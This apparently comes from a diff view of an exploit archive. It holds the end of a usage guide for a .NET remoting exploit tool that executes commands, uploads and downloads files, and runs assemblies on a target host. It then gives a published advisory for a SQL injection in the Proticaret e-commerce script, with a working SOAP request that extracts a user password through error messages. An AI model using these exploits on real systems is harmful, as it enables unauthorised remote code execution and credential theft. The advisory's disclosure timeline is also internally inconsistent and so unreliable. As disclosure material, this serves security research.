||||
-v, --verbose Enable verbose debug output
|
||||
--useser Uses old serialization tricks, only works on
|
||||
full type filter services
|
||||
-h, -?, --help
|
||||
|
||||
Commands:
|
||||
exec [-wait] program [cmdline]: Execute a process on the hosting server
|
||||
cmd cmdline : Execute a command line process and display stdou
|
||||
t
|
||||
put localfile remotefile : Upload a file to the hosting server
|
||||
get remotefile localfile : Download a file from the hosting server
|
||||
ls remotedir : List a remote directory
|
||||
run file [args] : Upload and execute an assembly, calls entry point
|
||||
user : Print the current username
|
||||
ver : Print the OS version
|
||||
|
||||
This tool supports exploit both TCP remoting services and local IPC services. To test
|
||||
the exploit you need to know the name of the .NET remoting service and the port it's
|
||||
listening on (for TCP) or the name of the Named Pipe (for IPC). You can normally find
|
||||
this in the server or client code. Look for things like calls to:
|
||||
|
||||
RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance
|
||||
|
||||
You can then try the exploit by constructing an appropriate URL. If TCP you can use the
|
||||
URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName.
|
||||
|
||||
A simple test is to do:
|
||||
|
||||
ExploitRemotingService SERVICEURL ver
|
||||
|
||||
If successful it should print the OS version of the hosting .NET remoting service. If
|
||||
you get an exception it might be fixed with CVE-2014-1806. At this point try the COM
|
||||
version using:
|
||||
|
||||
ExploitRemotingService -usecom SERVICEURL ver
|
||||
|
||||
This works best locally but can work remotely if you modify the COM configuration and
|
||||
disable the firewall you should be able to get it to work. If that still doesn't work
|
||||
then it might be an up to date server. Instead you can also try the full serialization
|
||||
version using.
|
||||
|
||||
ExploitRemotingService -useser SERVICEURL ls c:\
|
||||
|
||||
For this to work the remoting service must be running with full typefilter mode enabled
|
||||
(which is some, especially IPC services). It also only works with the commands ls, put
|
||||
and get. But that should be enough to compromise a box.
|
||||
|
||||
I've provided an example service to test against.
|
124
platforms/xml/webapps/35275.txt
Executable file
124
platforms/xml/webapps/35275.txt
Executable file
|
@ -0,0 +1,124 @@
|
|||
Document Title:
|
||||
============
|
||||
Proticaret E-Commerce Script v3.0 >= SQL Injection
|
||||
|
||||
Release Date:
|
||||
===========
|
||||
13 Nov 2014
|
||||
|
||||
Product & Service Introduction:
|
||||
========================
|
||||
Proticaret is a free e-commerce script.
|
||||
|
||||
Abstract Advisory Information:
|
||||
=======================
|
||||
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
=========================
|
||||
20 Oct 2014 : Contact with Vendor
|
||||
20 Nov 2014 : Vendor Response
|
||||
June 26, 2014 : Patch Released
|
||||
13 Nov 2014 : Public Disclosure
|
||||
|
||||
Discovery Status:
|
||||
=============
|
||||
Published
|
||||
|
||||
Affected Product(s):
|
||||
===============
|
||||
Promist Bilgi ?leti?im Teknolojileri A.?
|
||||
Product: Proticaret E-commerce Script v3.0 >=
|
||||
|
||||
Exploitation Technique:
|
||||
==================
|
||||
Remote, Unauthenticated
|
||||
|
||||
|
||||
Severity Level:
|
||||
===========
|
||||
Critical
|
||||
|
||||
Technical Details & Description:
|
||||
========================
|
||||
SQL Injection
|
||||
|
||||
Proof of Concept (PoC):
|
||||
==================
|
||||
Proof of Concept
|
||||
|
||||
Request:
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
|
||||
<soapenv:Header/>
|
||||
<soapenv:Body>
|
||||
<tem:GetProductCodes>
|
||||
<!--Optional:-->
|
||||
<tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code>
|
||||
<!--Optional:-->
|
||||
<tem:StartWith>?</tem:StartWith>
|
||||
</tem:GetProductCodes>
|
||||
</soapenv:Body>
|
||||
</soapenv:Envelope>
|
||||
|
||||
Response:
|
||||
|
||||
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
|
||||
<soap:Body>
|
||||
<soap:Fault>
|
||||
<faultcode>soap:Server</faultcode>
|
||||
|
||||
<faultstring>System.Web.Services.Protocols.SoapException: Server
|
||||
was unable to process request. --->
|
||||
System.Data.SqlClient.SqlException: Conversion failed when converting
|
||||
the nvarchar value 'secretpassword' to data type int.
|
||||
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
|
||||
|
||||
at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException
|
||||
exception, Boolean breakConnection, Action`1 wrapCloseInAction)
|
||||
at
|
||||
|
||||
System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject
|
||||
stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
|
||||
at
|
||||
System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior,
|
||||
SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet
|
||||
bulkCopyHandler, TdsParserStateObject stateObj, Boolean&
|
||||
dataReady)
|
||||
at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
|
||||
at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
|
||||
at System.Data.SqlClient.SqlDataReader.Read()
|
||||
at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
|
||||
--- End of inner exception stack trace ---</faultstring>
|
||||
<detail/>
|
||||
</soap:Fault>
|
||||
</soap:Body>
|
||||
</soap:Envelope>
|
||||
|
||||
|
||||
Solution Fix & Patch:
|
||||
================
|
||||
Apply the patch for v3.0
|
||||
|
||||
Security Risk:
|
||||
==========
|
||||
The risk of the vulnerabilities above estimated as critical.
|
||||
|
||||
Credits & Authors:
|
||||
==============
|
||||
Bilgi Güvenli?i Akademisi
|
||||
|
||||
Disclaimer & Information:
|
||||
===================
|
||||
The
|
||||
information provided in this advisory is provided as it is without any
|
||||
warranty. BGA disclaims all warranties, either expressed or implied,
|
||||
including the warranties of merchantability and capability for a
|
||||
particular purpose. BGA or its suppliers are not liable in any case of
|
||||
damage, including direct, indirect, incidental, consequential loss of
|
||||
business profits or special damages.
|
||||
|
||||
Domain: www.bga.com.tr
|
||||
Social: twitter.com/bgasecurity
|
||||
Contact: bilgi@bga.com.tr
|
||||
|
||||
Copyright © 2014 | BGA
|
Loading…
Add table
Reference in a new issue